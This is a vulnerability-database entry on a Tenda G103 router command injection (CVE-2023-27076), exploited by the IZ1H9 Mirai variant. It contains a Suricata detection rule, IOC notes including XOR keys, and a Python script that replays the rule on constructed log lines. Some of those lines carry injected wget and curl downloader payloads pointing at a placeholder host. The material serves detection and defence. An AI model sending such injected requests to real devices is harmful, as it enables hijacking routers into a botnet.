# CVE-2023-27076
Published: 2023-04-10
Command injection vulnerability found in Tenda G103 v.1.0.0.5 allows an attacker to execute arbitrary code via the language parameter.
Priority: P1 · 83 · critical · CVSS 3.1 base score 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW: VulnCheck KEV (exploited in the wild)
EPSS: 22.93% (97.5th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tenda | g103_firmware | — | — |
Detection & IOCs (extracted from sources)
Path: /cgi-bin/luci?language=
Snort/Suricata rule (ET sid 2048547):
```
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Tenda G103 Command Injection Attempt (CVE-2023-27076)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/luci?language="; fast_pattern; startswith; pcre:"/(?:(wget|curl))/R"; reference:url,unit42.paloaltonetworks.com/mirai-variant-iz1h9/; reference:cve,2023-27076; classtype:attempted-admin; sid:2048547; rev:1; metadata:attack_target IoT, created_at 2023_10_12, cve CVE_2023_27076, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_10_12, reviewed_at 2023_10_12, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services; target:dest_ip;)
```
- The exploit targets the `language` parameter via an HTTP GET to /cgi-bin/luci; look for wget or curl in the URI (the rule's PCRE matches against the value of the language parameter)
- IZ1H9 configuration strings are XOR-encrypted with an effective single-byte key of 0xEA (derived from the table key 0xBAADF00D); scan for this decryption pattern in samples
- The Telnet/SSH credential brute-force uses a 1-byte XOR key of 0x54 to encrypt roughly 100 pairs of default login credentials in the scanner function
- Palo Alto Threat Prevention signatures 93386, 93718, 93721 and 93722 cover the exploit traffic and the malware associated with this campaign
- The Tenda G103 exploit payload in this IZ1H9 sample is broken: it downloads tenda.sh but executes netlog.sh, so the exploit never runs the intended downloader; network detection should still alert on the download of tenda.sh from the malware host
- Multiple campaigns share the same XOR key (0xBAADF00D / effective 0xEA) and near-identical shell script downloaders, suggesting a single threat actor operating across campaigns since November 2021
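The ET rule above encodes its detection logic as three conditions: the method is GET, the request URI starts with `/cgi-bin/luci?language=`, and `wget` or `curl` appears somewhere after that prefix (the `/R` flag makes the PCRE relative to the previous content match). The following Python is an added example, not code from this page or from Emerging Threats, that applies the same logic to access-log style lines so the rule's behaviour can be checked offline; the log lines are constructed here, and percent-decoding the URI before matching is an assumption that approximates Suricata's normalized `http.uri` buffer.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample of access-log style lines ("METHOD URI STATUS"); not taken
# from any real device or capture. 192.0.2.10 is a documentation address.
SAMPLE_LOG = """\
GET /cgi-bin/luci?language=en 200
GET /cgi-bin/luci?language=wget+http://192.0.2.10/tenda.sh 200
GET /cgi-bin/luci?language=%63%75%72%6c+http://192.0.2.10/tenda.sh 200
POST /cgi-bin/luci?language=wget+http://192.0.2.10/tenda.sh 200
GET /cgi-bin/luci/admin?language=curl 200
GET /index.html 404
"""

URI_PREFIX = "/cgi-bin/luci?language="

# Mirrors pcre:"/(?:(wget|curl))/R": with /R the search starts where the previous
# content match ended, so the downloader keyword must follow the prefix.
DOWNLOADER_RE = re.compile(r"wget|curl")


def matches_rule(method: str, uri: str) -> bool:
    """Return True if (method, uri) would trigger ET sid 2048547 as quoted above.

    Conditions taken from the rule: http.method must be GET, http.uri must start
    with the prefix (content + startswith), and wget/curl must appear after it.
    The raw URI is percent-decoded first as an assumed approximation of the
    normalization Suricata applies to http.uri.
    """
    if method != "GET":
        return False
    decoded = unquote_plus(uri)
    if not decoded.startswith(URI_PREFIX):
        return False
    # Search only the part after the prefix, i.e. the language parameter value.
    return DOWNLOADER_RE.search(decoded, len(URI_PREFIX)) is not None


def scan_log(text: str) -> list[str]:
    """Return the raw URIs of every request in an access-log style text that alerts."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue  # malformed line: no method/URI pair to evaluate
        method, uri = parts[0], parts[1]
        if matches_rule(method, uri):
            hits.append(uri)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("ALERT sid 2048547:", hit)
```

Of the six constructed lines only the second and third alert: the benign `language=en` request has no downloader keyword, the POST fails the method check, and the request to `/cgi-bin/luci/admin` fails the `startswith` check even though it contains `curl`. The percent-encoded `curl` in the third line is caught only because the URI is decoded before matching, which is why an IDS matching on the raw, un-normalized URI would miss it.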
CVSS provenance
- NVD (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- VulnCheck: 9.8 CRITICAL
GHSA
GHSA-4vjm-pw8m-56h5 · ghsa_unreviewed · 2023-04-10 · CRITICAL · CWE-78
Command injection vulnerability found in Tenda G103 v.1.0.0.5 allows an attacker to execute arbitrary code via the language parameter.
VulnCheck
Tenda g103_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck · 2023 · CVSS 9.8 · CRITICAL
Command injection vulnerability found in Tenda G103 v.1.0.0.5 allows an attacker to execute arbitrary code via the language parameter.
Affected: Tenda g103_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
- https://www.fortiguard.com/outbreak-alert/router-malware-attack
- https://unit42.paloaltonetworks.com/mirai-variant-iz1h9/
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-10-19&host_type=src&vulnerability=cve-2023-27076
Suricata
ET EXPLOIT Tenda G103 Command Injection Attempt (CVE-2023-27076)
suricata · 2023-10-12 · CVSS 9.8 · CRITICAL
Rule: ET sid 2048547, quoted in full under Detection & IOCs above.
No public exploits indexed.
Unit42
Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
blogs_unit42 · 2023-05-25 · CVSS 9.8 · indexed under CVE-2023-26801 and CVE-2023-27076
Authors: Chao Lei, Zhibin Zhang, Cecilia Hu
Published: May 25, 2023
Tags: Trend Reports, Vulnerabilities, CVE-2023-26801, CVE-2023-26802, CVE-2023-27076, IoT, IZ1H9, Mirai variant
## Executive Summary
On April 10, Unit 42 researchers observed a Mirai variant called IZ1H9, which used several vulnerabilities to spread itself. The threat actors use the following vulnerabilities to target exposed servers and networking devices running Linux:
- CVE-2023-27076: Tenda G103 command injection vulnerability
- CVE-2023-26801: LB-Link command injection vulnerability
- CVE-2023-26802: DCN DCBI-Netlog-LAB remote code execution vulnerability
- Zyxel remote code execution vulnerability
Compromised devices can be fully controlled by attackers and become a part of the botnet. Those devices can be used to conduct further attacks, such as distributed denial-of-service (DDoS) attacks.
Palo Alto Networks Next Generation Firewall customers receive protections through Cloud-Delivered S